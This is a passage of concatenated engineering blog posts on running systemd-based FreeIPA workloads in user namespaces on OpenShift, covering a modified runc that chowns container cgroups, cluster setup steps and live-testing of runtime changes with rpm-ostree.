sh-4.4# crictl inspect d1641639 | jq .info.pid
18668
Next I used pgrep to find all the processes that share the same
set of namespaces as process 18668. In other words, processes
running in the same pod sandbox.
sh-4.4# pgrep --ns 18668 \
    | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
1000580+   18668 sleep 3600
1000580+   26490 /bin/sh
There are two processes, running under an unpriviled UID. The UID
comes from a unique range allocated for the userns project. These
two processes are the main container process (sleep), and the
shell that I exected a few steps ago. As expected.
Now for the fun part. Back to the shell we opened in pod/fedora.
Observe that this shell process has an empty capability set:
sh-5.1$ grep Cap /proc/$$/status
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000000000000000
CapAmb: 0000000000000000
And yet, using unshare(1) I was able to create a new user
namespace. The -r option says to map root in the new user
namespace to the user that created the namespace. And that is
indeed what happens:
sh-5.1$ unshare -U -r
[root@fedora /]# id
uid=0(root) gid=0(root) groups=0(root),65534(nobody)
I confirmed it via the node debug shell. I ran pgrep again, this
time restricting the search to processes in the same pid namespace
as process 18668. The --nslist option gives the list of
namespaces to match (all namespaces when not specified).
sh-4.4# pgrep --ns 18668 --nslist pid \
    | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
1000580+   18668 sleep 3600
1000580+   26490 /bin/sh
1000580+   36704 -sh
The new shell has pid 36704. Observe that UID 0 in the
container maps to UID 1000580000:
sh-4.4# cat /proc/36704/uid_map
         0 1000580000          1
Discussion §
You can create and use user namespaces inside your containers
without any special support from OpenShift or Kubernetes.
Therefore, the idea of a OpenShift or Kubernetes feature for running
a workload in an isolated user namespace by default does not lead
to an increased risk of container escapes or privilege escalation
related to processes running as uid 0 in a user namespace.
This is not to gloss over the fact that other parts of a “workloads
in user namespaces” feature have to be designed and implemented with
care. Particular aspects include pod admission and selection of the
unprivileged UIDs to map to. But on the question of the security of
the Linux user namespaces feature itself, a first class OpenShift of
Kubernetes feature doesn’t introduce any new risk. Whatever risk
there is, is there right now.
If some critical security with user namespaces emerges and you need
an urgent mitigation, the only option is to alter the container
runtime Seccomp policies to block the unshare(2) syscall. This is
an advanced topic, involving changes to node configuration. For
details, see Configuring seccomp profiles in the
official OpenShift documentation.


Demo: namespaced systemd workloads on OpenShift
2021-07-22T00:00:00Z
Demo: namespaced systemd workloads on OpenShift
I have spent much of the last year diving deep into OpenShift’s
container runtime. The goal: work out how to run systemd-based
workloads in user namespaces on OpenShift nodes. The exploration
took many twists and turns. But finally, I have achieved the goal.
In this post I recap the journey so far, and
demonstrate what I have achieved. Then I will
summarise the path(s?) forward from here.
The journey so far §
My previous post
gives an overview of the FreeIPA on OpenShift project. In
particular, it explains our decision to use a “monolithic”
systemd-based container. That implementation approach exposed
capability gaps in OpenShift and led to a long running series of
investigations. I wrote up the results of these investigations
across several blog posts, summarised here:
OpenShift and user namespaces §
I observed that OpenShift (4.6 at the time) did not isolate
containers in user namespaces. I noted that KEP-127 proposes
user namespace support for Kubernetes (it is still being worked
on). CRI-O
had also recently added
support for user
namespaces via annotations.
User namespaces in OpenShift via CRI-O annotations §
I tested CRI-O’s annotation-based user namespace support on
OpenShift 4.7 nightlies. I found that the runtime creates a sandbox
with a user namespace and the expected UID mappings. I also found
that it is necessary to override the net.ipv4.ping_group_range
sysctl. Also, the SCC enforcement machinery does not know about
user namespaces and therefore the account that creates the container
requires the anyuid SCC. These deficiencies still exist today.
User namespace support in OpenShift 4.7 §
I continued my investigation after the release of OpenShift 4.7.
With the aforementioned caveats, user namespaces work. I also noted
an inconsistent treatment of securityContext: specifying
runAsUser in the PodSpec maps the container’s UID 0 to host
UID 0—a dangerous configuration.
More recently, I noticed that the userns-mode annotation I was
using included map-to-root=true. I now understand that it is this
configuration that causes this mapping behaviour. I no longer
consider it particularly serious. Ideally the SCC enforcement
should learn about user namespaces, and prevent unprivileged users
from creating containers that run as root (or other system
accounts) on the host.
Multiple users in user namespaces on OpenShift §
I verified that workloads that run processes under a variety of user
accounts work as expected in user namespaces. I did not use a
systemd-based workload to verify this.
systemd containers on OpenShift with cgroups v2 §
I observed that systemd-based workloads run successfully in
OpenShift when executed as UID 0 on the host. Such containers can
only be created by accounts granted privileged SCCs (e.g. anyuid).
When running the container under other UIDs, systemd can’t run
because it does not have write permission on the container’s cgroup
directory.
Using runc to explore the OCI Runtime Specification §
I investigated how runc (the OCI runtime used in OpenShift)
operates, and how it creates cgroups. I identified some potential
ways to change the ownership of the container cgroup to the
container’s UID 0.
systemd, cgroups and subuid ranges §
I discovered that the systemd transient unit API (which runc
uses to create container cgroups) allows specifying a different
owner for the new cgroup. Unfortunately, the user must be “known”,
in the form of a passwd entity via NSSwitch. A proposal to relax
this requirement
was provisionally rejected. Other approaches include writing an
NSSwitch module to synthesise passwd entities for subuids, or
modifying runc to chown(2) the container cgroup after systemd
creates it. I decided to experiment with the latter approach.
Modifying runc to chown the container cgroup §
The main challenge in modifying runc was getting my head around
the unfamiliar codebase. The actual operations are straightforward.
There are two main aspects.
The first aspect is to compute the appropriate owner UID for the
cgroup, and tell it to the cgroup manager object. I described the
algorithm in a previous post. The config.HostRootUID() method
already implements this computation. I was able to reuse it.
The second aspect is to actually chown(2) the relevant cgroup
files and directories. I previously observed systemd’s behaviour
when creating units owned by arbitrary users. systemd chowns the
container’s cgroup directory, and the cgroup.procs,
cgroup.subtree_control and cgroup.threads files within that
directory. runc will do the same. The cgroup manager object
already knows the path to the container cgroup directory. It
changes the owner of the directory and same three files as systemd
to the relevant user.
Demo §
Following is a step-by-step demonstration starting with a fresh
deployment of OpenShift 4.7.20.
% oc get clusterversion
NAME      VERSION   AVAILABLE   PROGRESSING   SINCE   STATUS
version   4.7.20    True        False         8m52s   Cluster version is 4.7.20

There is a regression
in OpenShift 4.8.0 that prevents Pod annotations from being propagated
to container OCI configurations. As a consequence, runc does not
receive the annotations that trigger the experimental behaviour. I
filed a pull request
that fixes the issue. The patch was accepted and the fix released
in OpenShift 4.8.4.

The latent credential is the cluster admin user. Where relevant,
I use the oc --as USER option to execute commands as other users.
% oc whoami
system:admin
Install modified runc package §
List the nodes in the cluster:
% oc get node
NAME                                       STATUS   ROLES    AGE   VERSION
ci-ln-jqbnbfk-f76d1-gnkkv-master-0         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-master-1         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-master-2         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv   Ready    worker   52m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-b-dxk6k   Ready    worker   52m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w   Ready    worker   52m   v1.20.0+01c9f3f
For each worker node, open a node debug shell and use rpm-ostree override replace to install the modified runc (one worker shown):
% oc debug node/ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv
Starting pod/ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.32.2
If you don't see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm-ostree override replace https://ftweedal.fedorapeople.org/runc-1.0.0-990.rhaos4.8.gitcd80260.el8.x86_64.rpm
Downloading 'https://ftweedal.fedorapeople.org/runc-1.0.0-990.rhaos4.8.gitcd80260.el8.x86_64.rpm'... done!
Checking out tree 9767154... done
No enabled rpm-md repositories.
Importing rpm-md... done
Resolving dependencies... done
Applying 1 override
Processing packages... done
Running pre scripts... done
Running post scripts... done
Running posttrans scripts... done
Writing rpmdb... done
Writing OSTree commit... done
Staging deployment... done
Upgraded:
  runc 1.0.0-96.rhaos4.8.gitcd80260.el8 -> 1.0.0-990.rhaos4.8.gitcd80260.el8
Run "systemctl reboot" to start a reboot

Instead of installing the modified runc on all worker nodes, you
could update one node and use .spec.nodeAffinity in the PodSpec
to force the pod to run on that node.

Don’t worry about the restart right now (it will happen in the next
step). Exit the debug shell:
sh-4.4# exit
sh-4.2# exit

Removing debug pod ...
Enable user namespaces and cgroups v2 §
The following MachineConfig enables cgroups v2 and CRI-O
annotation-based user namespace support:
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  labels:
    machineconfiguration.openshift.io/role: worker
  name: userns-cgv2
spec:
  kernelArguments:
    - systemd.unified_cgroup_hierarchy=1
    - cgroup_no_v1="all"
    - psi=1
  config:
    ignition:
      version: 3.1.0
    storage:
      files:
      - path: /etc/crio/crio.conf.d/99-crio-userns.conf
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,W2NyaW8ucnVudGltZS5ydW50aW1lcy5ydW5jXQphbGxvd2VkX2Fubm90YXRpb25zPVsiaW8ua3ViZXJuZXRlcy5jcmktby51c2VybnMtbW9kZSJdCg==
      - path: /etc/subuid
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==
      - path: /etc/subgid
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==
The file /etc/crio/crio.conf.d/99-crio-userns.conf enables CRI-O’s
annotation-based user namespace support. Its content
(base64-encoded in the MachineConfig) is:
[crio.runtime.runtimes.runc]
allowed_annotations=["io.kubernetes.cri-o.userns-mode"]
The MachineConfig also overrides /etc/subuid and /etc/subgid,
defining sub-id ranges for user namespaces. The content is the same
for both files:
core:100000:65536
containers:200000:268435456
Create the MachineConfig:
% oc create -f machineconfig-userns-cgv2.yaml
machineconfig.machineconfiguration.openshift.io/userns-cgv2 created
Wait for the Machine Config Operator to apply the changes and reboot
the worker nodes:
% oc wait mcp/worker --for condition=updated --timeout=-1s
machineconfigpool.machineconfiguration.openshift.io/worker condition met
It will take several minutes, as worker nodes get rebooted one a time.
Create project and user §
Create a new project called test:
% oc new-project test
Now using project "test" on server "https://api.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com:6443".

You can add applications to this project with the 'new-app' command. For example, try:

    oc new-app ruby~https://github.com/sclorg/ruby-ex.git

to build a new example application in Python. Or use kubectl to deploy a simple Kubernetes application:

    kubectl create deployment hello-node --image=gcr.io/hello-minikube-zero-install/hello-node
The output shows the public domain name of this cluster:
ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com. We need to know
this for creating the route in the next step.
Create a user called test. Grant it admin role on project
test, and the anyuid Security Context Constraint (SCC)
privilege:
% oc create user test
user.user.openshift.io/test created
% oc adm policy add-role-to-user admin test
clusterrole.rbac.authorization.k8s.io/admin added: "test"
% oc adm policy add-scc-to-user anyuid test
securitycontextconstraints.security.openshift.io/anyuid added to: ["test"]
Create service and route §
Create a service to provide HTTP access to pods matching the app: nginx selector:
apiVersion: v1
kind: Service
metadata:
  name: nginx
spec:
  selector:
    app: nginx
  ports:
    - protocol: TCP
      port: 80
% oc create -f service-nginx.yaml
service/nginx created
The following route definition will provide HTTP ingress from
outside the cluster:
apiVersion: v1
kind: Route
metadata:
  name: nginx
spec:
  host: nginx.apps.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com
  to:
    kind: Service
    name: nginx
Note the host field. Its value is nginx.apps.$CLUSTER_DOMAIN.
Change it to the proper value for your cluster, then create the
route:
% oc create -f route-nginx.yaml
route.route.openshift.io/nginx created
There is no pod to route the traffic to… yet.
Create pod §
The pod specification is:
apiVersion: v1
kind: Pod
metadata:
  name: nginx
  labels:
    app: nginx
  annotations:
    io.kubernetes.cri-o.userns-mode: "auto:size=65536"
spec:
  securityContext:
    sysctls:
    - name: "net.ipv4.ping_group_range"
      value: "0 65535"
  containers:
  - name: nginx
    image: quay.io/ftweedal/test-nginx:latest
    tty: true
Create the pod:
% oc --as test create -f pod-nginx.yaml
pod/nginx created
After a few seconds, the pod is running:
% oc get -o json pod/nginx | jq .status.phase
"Running"
Tail the pod’s log. Observe the final lines of systemd boot output
and the login prompt:
% oc logs --tail 10 pod/nginx
[  OK  ] Started The nginx HTTP and reverse proxy server.
[  OK  ] Reached target Multi-User System.
[  OK  ] Reached target Graphical Interface.
         Starting Update UTMP about System Runlevel Changes...
[  OK  ] Finished Update UTMP about System Runlevel Changes.

Fedora 33 (Container Image)
Kernel 4.18.0-305.3.1.el8_4.x86_64 on an x86_64 (console)

nginx login: %

Without tty: true in the Container spec, the pod won’t produce
any output and oc logs won’t have anything to show.

The log tail also shows that systemd started the nginx service.
We already set up a route in the previous step. Use curl to
issue an HTTP request and verify that the service is running
properly:
% curl --head \
    nginx.apps.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 21 Jul 2021 06:55:38 GMT
Content-Type: text/html
Content-Length: 5564
Last-Modified: Mon, 27 Jul 2020 22:20:49 GMT
ETag: "5f1f5341-15bc"
Accept-Ranges: bytes
Set-Cookie: 6cf5f3bc2fa4d24f45018c591d3617c3=f114e839b2eef9cdbe00856f18a06336; path=/; HttpOnly
Cache-control: private
Verify sandbox §
Now let’s verify that the container is indeed running in a user
namespace. Container UIDs must map to unprivileged UIDs on the
host. Query the worker node on which the pod is running, and its
CRI-O container ID:
% oc get -o json pod/nginx | jq \
    '.spec.nodeName, .status.containerStatuses[0].containerID'
"ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w"
"cri-o://bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0"
Start a debug shell on the node and query the PID of the container
init process:
% oc debug node/ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w
Starting pod/ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.32.4
If you don't see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# crictl inspect bf2b3d | jq .info.pid
7759
Query the UID map and process tree of the container:
sh-4.4# cat /proc/7759/uid_map
         0     200000      65536
sh-4.4# pgrep --ns 7759 | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
200000      7759 /sbin/init
200000      7796 /usr/lib/systemd/systemd-journald
200193      7803 /usr/lib/systemd/systemd-resolved
200000      7806 /usr/lib/systemd/systemd-homed
200000      7807 /usr/lib/systemd/systemd-logind
200081      7809 /usr/bin/dbus-broker-launch --scope system --audit
200000      7812 /sbin/agetty -o -p -- \u --noclear --keep-baud console 115200,38400,9600 xterm
200081      7813 dbus-broker --log 4 --controller 9 --machine-id 2f2fcc4033c5428996568ca34219c72a --max-bytes 5
200000      7815 nginx: master process /usr/sbin/nginx
200999      7816 nginx: worker process
200999      7817 nginx: worker process
200999      7818 nginx: worker process
200999      7819 nginx: worker process
This confirms that the container has a user namespace. The
container’s UID range is 0–65535, which maps to the host UID
range 200000–265535. The ps output shows various services
running under systemd, running under unprivileged host UIDs in this
range.
So, everything is running as expected. One last thing: let’s look
at the cgroup ownership. Query the container’s cgroupsPath:
sh-4.4# crictl inspect bf2b3d | jq .info.runtimeSpec.linux.cgroupsPath
"kubepods-besteffort-podc7f11ee7_e178_4dea_9d8c_c005ad648988.slice:crio:bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0"
The value isn’t a filesystem path. runc interprets it relative to
an implementation-defined location. We expect the cgroup directory
and the three files mentioned earlier to be owned by the user that
maps to UID 0 in the container’s user namespace. In my case,
that’s 200000. We also expect to see scopes and slices created by
systemd in the container to be owned by the same user.
sh-4.4# ls -ali /sys/fs/cgroup\
/kubepods.slice/kubepods-besteffort.slice\
/kubepods-besteffort-podc7f11ee7_e178_4dea_9d8c_c005ad648988.slice\
/crio-bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0.scope \
    | grep 200000
14755 drwxr-xr-x.  5 200000 root   0 Jul 21 06:00 .
14757 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.procs
14760 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.subtree_control
14758 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.threads
14806 drwxr-xr-x.  2 200000 200000 0 Jul 21 06:00 init.scope
14835 drwxr-xr-x. 11 200000 200000 0 Jul 21 06:15 system.slice
14922 drwxr-xr-x.  2 200000 200000 0 Jul 21 06:00 user.slice
Note the inode of the container cgroup directory: 14755. We can query the
inode and ownership of /sys/fs/cgroup within the pod:
% oc exec pod/nginx -- ls -ldi /sys/fs/cgroup
14755 drwxr-xr-x. 5 root nobody 0 Jul 21 06:00 /sys/fs/cgroup
The inode is the same; this is indeed the same cgroup. But within the
container’s user namespace, the owner appears as root.
This concludes the verification steps. With my modified version of
runc, systemd-based workloads are indeed working properly in user
namespaces.
Next steps §
I submitted a pull request with these changes. It remains to be
seen if the general approach will be accepted, but initial feedback
is positive. Some implementation changes are needed. I might have
to hide the behaviour behind a feature gate (e.g. to be activated
via an annotation). I also need to write tests and documentation.
I also need to raise a ticket for the SCC issue. The requirement
for RunAsAny (which is granted by the anyuid SCC) should be
relaxed when the sandbox has a user namespace. The SCC enforcement
machinery needs to be enhanced to understand user namespaces, so
that unprivileged OpenShift user accounts can run workloads in them.
It would be nice to find a way to avoid the sysctl override to allow
the container user to use ping. This is a much lower priority.
Alongside these matters, I can begin testing the FreeIPA container
in the test environment. Although systemd is now working, I need to
see if the FreeIPA’s constituent services will run properly. I
anticipate that I will need to tweak the Pod configuration somewhat.
But are there more runtime capability gaps waiting to be discovered?
I don’t have a particular suspicion about it, but I do need to know
for certain, one way or the other. So expect another blog post
soon!


FreeIPA on OpenShift: July 2021 update
2021-07-21T00:00:00Z
FreeIPA on OpenShift: July 2021 update
Over the last year I’ve done a lot of investigations into OpenShift,
and container runtimes more generally. The driver of this work is
the FreeIPA on OpenShift project (known within Red Hat as IDMOCP).
I published the results of my investigations in numerous blog posts,
but I have not yet written much about why we are doing this at
all.
So it’s time to fix that. In this short post I discuss why we want
FreeIPA on OpenShift, and the major decision that put us on our
current implementation path.
FreeIPA is a centralised identity management system for the
enterprise. You enrol users, hosts and services, and configure
access policies and other security mechanisms. The system provides
authentication and policy enforcement mechanisms. It is similar to
Microsoft Active Directory (and indeed can integrate with AD).
FreeIPA is a complex system with lots of components including:

LDAP server (389 DS / RHDS)
Kerberos KDC (MIT Kerberos)
Certificate authority (Dogtag / RHCS)
HTTP API (Apache httpd and a lot of Python code)
Host client daemon (SSSD)
several smaller supporting services
installation and administration tools

FreeIPA is available on Fedora and RHEL. You install the RPMs and
the installation program configures the system. It is intended to
be deployed on a dedicated machine (VM or bare metal).
We are motivated to support FreeIPA on OpenShift for several
reasons, including:

Easily providing identity services to applications running on
OpenShift.
Leveraging OpenShift and Kubernetes orchestration, scalaing and
management features to improve robustness and reduce management
overhead of FreeIPA deployments.
Offering FreeIPA, hosted on OpenShift, as a managed service.

Understandably, moving such an application to OpenShift is a
non-trivial task. At the beginning of this effort, we had to decide
the main implementation approach. There were three options:

Put the whole system in a single “monolithic container”, with
systemd as the init process. At the time (and still today)
OpenShift only supports running systemd workloads in privileged
containers, which is not acceptable. The runtime needs to evolve
to support this use case. Work on some of the missing features
(such as user namespaces and cgroups v2) was already underway.
Deploy different parts of the FreeIPA system in different
containers, running unprivileged. This is a fundamental shift
from the current architecture and a huge up-front engineering
effort. Also, the current architecture has to be maintained and
supported for a long time (>10 years). So this approach brings
a substantial ongoing cost in maintaining two architectures of
the same application. On a technical level, this approach is
feasible today.
Use a VM-based workload (Kata / OpenShift Sandboxed Containers).
This option probably has the lowest up-front and ongoing
engineering costs. But it requires a bare metal cluster or
nested virtualisation, which is not available from most cloud
providers. By extension, OpenShift Dedicated (OSD) also
does not supported it. Red Hat managed services run on OSD.
Offering a managed service is one of the motivators of our
effort. So at this time, VM-based workloads are not an option
for us.

As a small team, and considering the business reality of the
existing offering as part of RHEL, we decided to pursue the
“monolithic container” approach. We are depending on the OpenShift
runtime evolving to a point where it can support fully isolated
systemd-based workloads. And that is why I have invested much of
the last 12 months in understanding container runtimes and pushing
their limits.
Our approach is not “cloud native” and indeed many people have
expressed alarm or confusion when we tell them what we are doing.
Certainly, if we were designing FreeIPA from the ground up in
today’s world, it would look very different from the current
architecture. But this is the reality: if you want customers to
bring their mature, complex applications onto OpenShift, don’t
expect them to spend big money and assume big risk to rearchitect
the application to fit the new environment.
What customers actually need is to be able to bring the application
across more or less as-is. Then they can realise the benefits
(automation, monitoring, scaling, etc) incrementally, with lower
up-front costs and less risk.
If my claims are correct, then proper systemd workload support in
OpenShift will be a Very Big Deal. But even if I’m wrong, it is
still critical for our FreeIPA on OpenShift effort. And it is
achievable. In my next post I’ll demonstrate my working proof of
concept for user-namespaced systemd workloads on OpenShift.


Live-testing changes in OpenShift clusters
2021-06-29T00:00:00Z
Live-testing changes in OpenShift clusters
I have been hacking on the runc container runtime. So how
do I test my changes in an OpenShift cluster?
One option is to compose a machine-os-content release via
coreos-assembler.
Then you can deploy or upgrade a cluster with that release. Indeed,
this approach is necessary for testing installation and upgrades.
It also seems useful for publishing modified versions for other
people to test. But it is a heavyweight and time consuming option.
For development I want a more lightweight approach. In this post
I’ll demonstrate how to use the rpm-ostree usroverlay and
rpm-ostree override replace commands to test changes in a live
OpenShift cluster.
Background §
OpenShift runs on CoreOS. CoreOS uses OSTree to manage
the filesystem. Most of the filesystem is immutable. When
upgrading, a new filesystem is prepared before rebooting the system.
The old filesystem is preserved, so it is easy to roll back.
So I can’t just log onto an OpenShift node and replace
/usr/bin/runc with my modified version. Nevertheless, I have seen
references to the rpm-ostree usroverlay command. It is
supposed to provide a writable overlayfs on /usr, so that you can
test modifications. Changes are lost upon reboot, but that’s fine
for testing.
There’s also the rpm-ostree override replace … command. This
command works on the level of RPM packages. It allows you to
install new packages or replace or remove packages. Changes persist
across reboots, but it is easy to roll back to the pristine state
of the current CoreOS release.
The rest of this article explores how to use these two commands to
apply changes to the cluster.
usroverlay via debug container (doesn’t work) §
I first attempted to use rpm-ostree usroverlay in a node debug
pod.
% oc debug node/worker-a
Starting pod/worker-a-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don't see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm-ostree usroverlay
Development mode enabled.  A writable overlayfs is now mounted on /usr.
All changes there will be discarded on reboot.
sh-4.4# touch /usr/bin/foo
touch: cannot touch '/usr/bin/foo': Read-only file system
The rpm-ostree usroverlay command succeeded. But /usr remained
read-only. The debug container has its own mount namespace, which
was unaffected. I guess that I need to log into the node directly
to use the writable /usr overlay. Perhaps it is also necessary to
execute rpm-ostree usroverlay as an unconfined user (in the
SELinux sense). I restarted the node to begin afresh:
sh-4.4# reboot

Removing debug pod ...
usroverlay via SSH §
For the next attempt, I logged into the worker node over SSH. The
first step was to add the SSH public key to the core user’s
authorized_keys file. Roberto Carratalá’s helpful blog post
explains how to do this. I will recap the critical bits.
SSH keys can be added via MachineConfig objects, which must also
specify the machine role (e.g. worker). The Machine Config
Operator will only add keys to the core user. Multiple keys can
be specified, across multiple MachineConfig objects—all the keys
in matching objects will be included.

I don’t have direct network access to the worker node. So how could
I log in over SSH? I generated a key in the node debug shell,
and will log in from there!
sh-4.4# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:jAmv…NMnY root@worker-a
sh-4.4# cat ~/.ssh/id_rsa.pub
ssh-rsa AAAA…4OU= root@worker-a

The following MachineConfig adds the SSH key for user core:
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  name: ssh-authorized-keys-worker
  labels:
    machineconfiguration.openshift.io/role: worker
spec:
  config:
    ignition:
      version: 3.2.0
    passwd:
      users:
      - name: core
        sshAuthorizedKeys:
        - ssh-rsa AAAA…40U= root@worker-a
I created the MachineConfig:
% oc create -f machineconfig-ssh-worker.yaml
machineconfig.machineconfiguration.openshift.io/ssh-authorized-keys created
In the node debug shell, I observed that Machine Config Operator
applied the change after a few seconds. It did not restart the
worker node. My key was added alongside a key defined in some other
MachineConfig.
sh-4.4# cat /var/home/core/.ssh/authorized_keys
ssh-rsa AAAA…jjNV devenv

ssh-rsa AAAA…4OU= root@worker-a
Now I could log in over SSH:
sh-4.4# ssh core@$(hostname)
The authenticity of host 'worker-a (10.0.128.2)' can't be established.
ECDSA key fingerprint is SHA256:LUaZOleqVFunmLCp4/E1naIQ+E5BpmVp0gcsXHGacPE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'worker-a,10.0.128.2' (ECDSA) to the list of known hosts.
Red Hat Enterprise Linux CoreOS 48.84.202106231817-0
  Part of OpenShift 4.8, RHCOS is a Kubernetes native operating system
  managed by the Machine Config Operator (`clusteroperator/machine-config`).

WARNING: Direct SSH access to machines is not recommended; instead,
make configuration changes via `machineconfig` objects:
  https://docs.openshift.com/container-platform/4.8/architecture/architecture-rhcos.html

---
[core@worker-a ~]$
The user is unconfined and I can see the normal, read-only (ro)
/usr mount (but no overlay):
[core@worker-a ~]$ id -Z
unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[core@worker-a ~]$ mount |grep "on /usr"
/dev/sda4 on /usr type xfs (ro,relatime,seclabel,attr2,inode64,logbufs=8,logbsize=32k,prjquota)
overlay on /usr type overlay (rw,relatime,seclabel,lowerdir=usr,upperdir=/var/tmp/ostree-unlock-ovl.KZ4V50/upper,workdir=/var/tmp/ostree-unlock-ovl.KZ4V50/work)
I executed rpm-ostree usroverlay via sudo. After that, a
read-write (rw) overlay filesystem is visible:
[core@worker-a ~]$ sudo rpm-ostree usroverlay
Development mode enabled.  A writable overlayfs is now mounted on /usr.
All changes there will be discarded on reboot.
[core@worker-a ~]$ mount |grep "on /usr"
/dev/sda4 on /usr type xfs (ro,relatime,seclabel,attr2,inode64,logbufs=8,logbsize=32k,prjquota)
overlay on /usr type overlay (rw,relatime,seclabel,lowerdir=usr,upperdir=/var/tmp/ostree-unlock-ovl.TCPM50/upper,workdir=/var/tmp/ostree-unlock-ovl.TCPM50/work)
And it is indeed writable. I made a copy of the original runc
binary, then installed my modified version:
[core@worker-a ~]$ sudo cp /usr/bin/runc /usr/bin/runc.orig
[core@worker-a ~]$ sudo curl -Ss -o /usr/bin/runc \
    https://ftweedal.fedorapeople.org/runc
Digression: use a buildroot §
The runc executable I installed on the previous step didn’t work.
I had built it on my workstation, against a too-new version of
glibc. The OpenShift node (which was running RHCOS 4.8, based on
RHEL 8.4) was unable to link runc. Therefore it could not run
any container workloads. I was able to SSH in from another node
and reboot, discarding the transient change in the usroverlay and
restoring the node to a functional state.
All of this is obvious in hindsight. You have to build the program
for the environment in which it will be executed. In my case, it
was easiest to do this via Brew or Koji. I cloned the dist-git
repository (via the fedpkg or rhpkg tool), created patches and
updated the runc.spec file. Then I built the SRPM (.src.rpm)
and started a scratch build in Brew. After the build completed I
made the resulting .rpm publicly available, so that it can be
fetched from the OpenShift cluster.
override replace via node debug container §
I now have my modified runc in an RPM package. So I can use
rpm-ostree override replace to install it. In a debug node on the
host:
sh-4.4# rpm-ostree override replace \
  https://ftweedal.fedorapeople.org/runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64.rpm
Downloading 'https://ftweedal.fedorapeople.org/runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64.rpm'... done!
Checking out tree eb6dd3b... done
No enabled rpm-md repositories.
Importing rpm-md... done
Resolving dependencies... done
Applying 1 override
Processing packages... done
Running pre scripts... done
Running post scripts... done
Running posttrans scripts... done
Writing rpmdb... done
Writing OSTree commit... done
Staging deployment... done
Upgraded:
  runc 1.0.0-97.rhaos4.8.gitcd80260.el8 -> 1.0.0-98.rhaos4.8.gitcd80260.el8
Run "systemctl reboot" to start a reboot
rpm-ostree downloaded the package and prepared the updated OS.
Per the advice, the update is not active yet; I need to reboot:
sh-4.4# rpm -q runc
runc-1.0.0-97.rhaos4.8.gitcd80260.el8.x86_64
sh-4.4# systemctl reboot
sh-4.4# exit
sh-4.2# 
Removing debug pod ...
After reboot I started a node debug container and verified that the
modified version of runc is visible:
% oc debug node/worker-a
Starting pod/worker-a-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don't see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm -q runc
runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64
And the fact that the debug container is working proves that the
modified version of runc isn’t completely broken! Testing the new
functionality is a topic for a different post, so I’ll leave it at
that.
Listing and resetting overrides §
rpm-ostree status --booted lists the current base image and any
overrides that have been applied:
sh-4.4# rpm-ostree status --booted
State: idle
BootedDeployment:
* pivot://quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:9a23adde268dc8937ae293594f58fc4039b574210f320ebdac85a50ef40220dd
              CustomOrigin: Managed by machine-config-operator
                   Version: 48.84.202106231817-0 (2021-06-23T18:21:06Z)
      ReplacedBasePackages: runc 1.0.0-97.rhaos4.8.gitcd80260.el8 -> 1.0.0-98.rhaos4.8.gitcd80260.el8
To reset an override for a specific package, run rpm-ostree override reset $PKG:
sh-4.4# rpm-ostree override reset runc
Staging deployment... done
Freed: 1.1 GB (pkgcache branches: 0)
Downgraded:
